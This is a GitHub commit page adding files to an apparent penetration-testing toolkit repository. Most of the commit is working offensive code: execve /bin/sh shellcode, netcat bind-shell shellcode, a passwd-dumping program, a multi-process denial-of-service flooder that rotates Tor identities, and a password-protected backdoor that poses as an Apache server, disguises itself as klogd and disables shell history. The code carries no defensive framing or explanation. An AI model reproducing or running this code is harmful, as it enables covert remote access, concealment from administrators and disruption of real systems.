forked from mariusv/Gray-Hacker-and-PenTesting
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Mari Wahl
committed
Feb 12, 2015
1 parent
589dec4
commit 7f078b1
Showing
19 changed files
with
2,613 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
#!/bin/bash | ||
if [ $# -ne 1 ] | ||
then | ||
printf "\n\tUsage: $0 filename\n\n" | ||
exit | ||
fi | ||
filename=`echo $1 | sed s/"\$"//` | ||
nasm -f elf $filename.asm && ld $filename.o -o $filename | ||
|
||
echo "Successfully compiled." |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,19 @@ | ||
;Universal Shellcode for Unix/Linux | ||
section .text ; Text section | ||
global _start ; Define _start function | ||
|
||
_start: ; _start function | ||
xor eax, eax ; Zero out eax REGister | ||
xor ebx, ebx ; Zero out ebx REGister | ||
xor ecx, ecx ; Zero out ecx REGister | ||
cdq ; Zero out edx using the sign bit from eax | ||
push ecx ; Insert 4 byte null in stack | ||
push 0x68732f6e ; Insert /bin in the stack | ||
push 0x69622f2f ; Insert //sh in the stack | ||
mov ebx, esp ; Put /bin//sh in stack | ||
push ecx ; Put 4 Byte in stack | ||
push ebx ; Put ebx in stack | ||
mov ecx, esp ; Insert ebx address in ecx | ||
xor eax, eax ; Zero out eax register | ||
mov al, 11 ; Insert __NR_execve 11 syscall | ||
int 0x80 ; Syscall execute |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,29 @@ | ||
;netcat backdoor to inject as a shellcode | ||
jmp short todo | ||
shellcode: | ||
xor eax, eax ; Zero out eax | ||
xor ebx, ebx ; Zero out ebx | ||
xor ecx, ecx ; Zero out ecx | ||
xor edx, edx ; Zero out edx using the sign bit from eax | ||
mov BYTE al, 0xa4 ; setresuid syscall 164 (0xa4) | ||
int 0x80 ; syscall execute | ||
pop esi ; esi contain the string in db | ||
xor eax, eax ; Zero out eax | ||
mov[esi + 7], al ; null terminate /bin/nc | ||
mov[esi + 16], al ; null terminate -lvp90 | ||
mov[esi + 26], al ; null terminate -e/bin/sh | ||
mov[esi + 27], esi ; store address of /bin/nc in AAAA | ||
lea ebx, [esi + 8] ; load address of -lvp90 into ebx | ||
mov[esi +31], ebx ; store address of -lvp90 in BBB taken from ebx | ||
lea ebx, [esi + 17] ; load address of -e/bin/sh into ebx | ||
mov[esi + 35], ebx ; store address of -e/bin/sh in CCCC taken from ebx | ||
mov[esi + 39], eax ; Zero out DDDD | ||
mov al, 11 ; 11 is execve syscakk number | ||
mov ebx, esi ; store address of /bin/nc | ||
lea ecx, [esi + 27] ; load address of ptr to argv[] array | ||
lea edx, [esi + 39] ; envp[] NULL | ||
int 0x80 ; syscall execute | ||
todo: | ||
call shellcode | ||
db '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD' | ||
; 0123456789012345678901234567890123456789012 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,10 @@ | ||
#include <pwd.h> | ||
int main() | ||
{ | ||
struct passwd *p; | ||
while( | ||
p=getpwent()) | ||
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,p->pw_passwd, | ||
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell); | ||
} | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,107 @@ | ||
|
||
#include <stdio.h> | ||
#include <stdlib.h> | ||
#include <string.h> | ||
#include <stdint.h> | ||
#include <unistd.h> | ||
#include <netdb.h> | ||
#include <signal.h> | ||
#include <sys/socket.h> | ||
#include <sys/types.h> | ||
#include <netinet/in.h> | ||
#include <arpa/inet.h> | ||
|
||
|
||
int make_socket(char *host, char *port) { | ||
struct addrinfo hints, *servinfo, *p; | ||
int sock, r; | ||
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port); | ||
memset(&hints, 0, sizeof(hints)); | ||
hints.ai_family = AF_UNSPEC; | ||
hints.ai_socktype = SOCK_STREAM; | ||
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) { | ||
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r)); | ||
exit(0); | ||
} | ||
for(p = servinfo; p != NULL; p = p->ai_next) { | ||
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) { | ||
continue; | ||
} | ||
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) { | ||
close(sock); | ||
continue; | ||
} | ||
break; | ||
} | ||
if(p == NULL) { | ||
if(servinfo) | ||
freeaddrinfo(servinfo); | ||
fprintf(stderr, "No connection could be made\n"); | ||
exit(0); | ||
} | ||
if(servinfo) | ||
freeaddrinfo(servinfo); | ||
fprintf(stderr, "[Connected -> %s:%s]\n", host, port); | ||
return sock; | ||
} | ||
|
||
|
||
void broke(int s) { | ||
// do nothing | ||
} | ||
|
||
|
||
#define CONNECTIONS 8 | ||
#define THREADS 48 | ||
|
||
|
||
void attack(char *host, char *port, int id) { | ||
int sockets[CONNECTIONS]; | ||
int x, g=1, r; | ||
for(x=0; x!= CONNECTIONS; x++) | ||
sockets[x]=0; | ||
signal(SIGPIPE, &broke); | ||
while(1) { | ||
for(x=0; x != CONNECTIONS; x++) { | ||
if(sockets[x] == 0) | ||
sockets[x] = make_socket(host, port); | ||
r=write(sockets[x], "\0", 1); | ||
if(r == -1) { | ||
close(sockets[x]); | ||
sockets[x] = make_socket(host, port); | ||
} else | ||
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r); | ||
fprintf(stderr, "[%i: Voly Sent]\n", id); | ||
} | ||
fprintf(stderr, "[%i: Voly Sent]\n", id); | ||
usleep(300000); | ||
} | ||
} | ||
|
||
|
||
void cycle_identity() { | ||
int r; | ||
int socket = make_socket("localhost", "9050"); | ||
write(socket, "AUTHENTICATE \"\"\n", 16); | ||
while(1) { | ||
r=write(socket, "signal NEWNYM\n\x00", 16); | ||
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r); | ||
usleep(300000); | ||
} | ||
} | ||
|
||
|
||
int main(int argc, char **argv) { | ||
int x; | ||
if(argc !=3) | ||
cycle_identity(); | ||
for(x=0; x != THREADS; x++) { | ||
if(fork()) | ||
attack(argv[1], argv[2], x); | ||
usleep(200000); | ||
} | ||
getc(stdin); | ||
return 0; | ||
} | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,8 @@ | ||
/* Get stack pointer of the system(Unix/Linux) */ | ||
#iclude <stdio.h> | ||
unsigned long get_sp(void) { | ||
__asm__("movl %esp,%eax"); | ||
} | ||
void main() { | ||
printf("0x%x\n", get_sp()); | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,129 @@ | ||
#define _XOPEN_SOURCE | ||
#include <stdio.h> | ||
#include <unistd.h> | ||
#include <stdlib.h> | ||
#include <sys/types.h> | ||
#include <sys/socket.h> | ||
#include <sys/wait.h> | ||
#include <netinet/in.h> | ||
#include <signal.h> | ||
#include <string.h> | ||
|
||
#define DEFAULT_PORT 8080 | ||
/* des crypted password */ | ||
#define PWD "QXtGlGiFUEeKY" | ||
|
||
void sig_hand(int sig) { | ||
int status; | ||
/* rip off children */ | ||
while(waitpid(-1,&status,WNOHANG)>0); | ||
|
||
} | ||
|
||
/* we hide ourselves as httpd daemon */ | ||
char *erro= | ||
"HTTP/1.1 404 Not Found\n" | ||
"Date: Mon, 08 Dec 1998 23:17:15 GMT\n" | ||
"Server: Apache/1.3.X (Unix)\n" | ||
"Connection: close\n" | ||
"Content-Type: text/html\n\n" | ||
"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n" | ||
"<HTML><HEAD>\n" | ||
"<TITLE>404 Not Found</TITLE>\n" | ||
"</HEAD><BODY>\n" | ||
"<H1>Not Found</H1>\n" | ||
"The requested URL /loha was not found on this server.<P>\n" | ||
"<HR>\n" | ||
"<ADDRESS>Apache/1.3.X Server at yourserver Port 80</ADDRESS>\n" | ||
"</BODY></HTML>\n"; | ||
|
||
void my_error(int fd) { | ||
write(fd,erro,strlen(erro)); | ||
} | ||
|
||
int main(int argc,char **argv) | ||
{ | ||
char *name[3]; | ||
char *env[2]; | ||
char *execname; | ||
int fd,fd2,fromlen; | ||
int port; | ||
struct sockaddr_in serv; | ||
char *crypted=PWD; | ||
unsigned char *ptr; | ||
char pass[9]; | ||
|
||
port=DEFAULT_PORT; | ||
if (argc>1 && atoi(argv[1])) port=atoi(argv[1]); | ||
#ifndef DEBUG | ||
if (fork()) exit(1); | ||
close(0); | ||
close(1); | ||
close(2); | ||
chdir("/"); | ||
setsid(); | ||
#endif | ||
signal(SIGCHLD,sig_hand); | ||
|
||
if((fd=socket(AF_INET,SOCK_STREAM,0))<0) { | ||
#ifdef DEBUG | ||
perror("socket"); | ||
#endif | ||
exit(1); | ||
} | ||
serv.sin_addr.s_addr=0; | ||
serv.sin_port=htons(port); | ||
serv.sin_family=AF_INET; | ||
|
||
if(bind(fd,(struct sockaddr *)&serv,16)) { | ||
#ifdef DEBUG | ||
perror("bind"); | ||
#endif | ||
exit(1); | ||
} | ||
|
||
if(listen(fd,5)) { | ||
#ifdef DEBUG | ||
perror("listen"); | ||
exit(1); | ||
#endif | ||
} | ||
|
||
for(;;) { | ||
fromlen=16; /*(sizeof(struct sockaddr)*/ | ||
fd2=accept(fd,(struct sockaddr *)&serv,&fromlen); | ||
if (fd2<0) continue; | ||
|
||
if (fork()) { /* parent */ | ||
close(fd2); | ||
} else { | ||
close(fd); | ||
bzero(pass,9); | ||
read(fd2,pass,8); | ||
for(ptr=pass;*ptr!=0;ptr++) | ||
if(*ptr<32) *ptr=0; | ||
if (strcmp(crypt(pass,crypted),crypted)) { | ||
my_error(fd2); | ||
exit(1); | ||
} | ||
dup2(fd2,0); | ||
dup2(fd2,1); | ||
dup2(fd2,2); | ||
execname="/bin/sh"; | ||
name[0]="/sbin/klogd"; | ||
/* gives somewhat nicer appearence */ | ||
name[1]="-i"; | ||
name[2]=NULL; | ||
/* if the actual /bin/sh is bash | ||
* we need this to get rid saving stuff into | ||
* .bash_history file | ||
*/ | ||
env[0]="HISTFILE=/dev/null"; | ||
env[1]=NULL; | ||
execve(name[0],name,env); | ||
exit(1); | ||
} | ||
} | ||
} | ||
|
||
|
Oops, something went wrong.